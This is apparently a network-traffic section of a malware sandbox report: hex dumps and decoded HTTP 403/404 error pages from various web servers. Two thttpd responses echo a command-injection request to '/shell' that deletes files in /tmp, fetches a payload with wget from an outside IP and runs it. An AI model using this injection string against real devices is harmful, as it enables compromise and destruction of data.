20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:23:52 GMTLast-Modified: Sat, 17 Oct 2015 00:23:52 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:08:51 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Content-Type: text/html; charset=iso-8859-1Accept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:51 GMTServer: ApacheContent-Length: 255Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:09:54 GMTServer: webserverX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:51 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:23:54 GMTLast-Modified: Sat, 17 Oct 2015 00:23:54 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 01 Nov 2021 09:08:53 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:53 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:53 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETsvr: 05Date: Mon, 01 Nov 2021 09:08:53 GMTContent-Length: 1245Set-Cookie: CacheWeb=2270734528.20480.0000; path=/Vary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 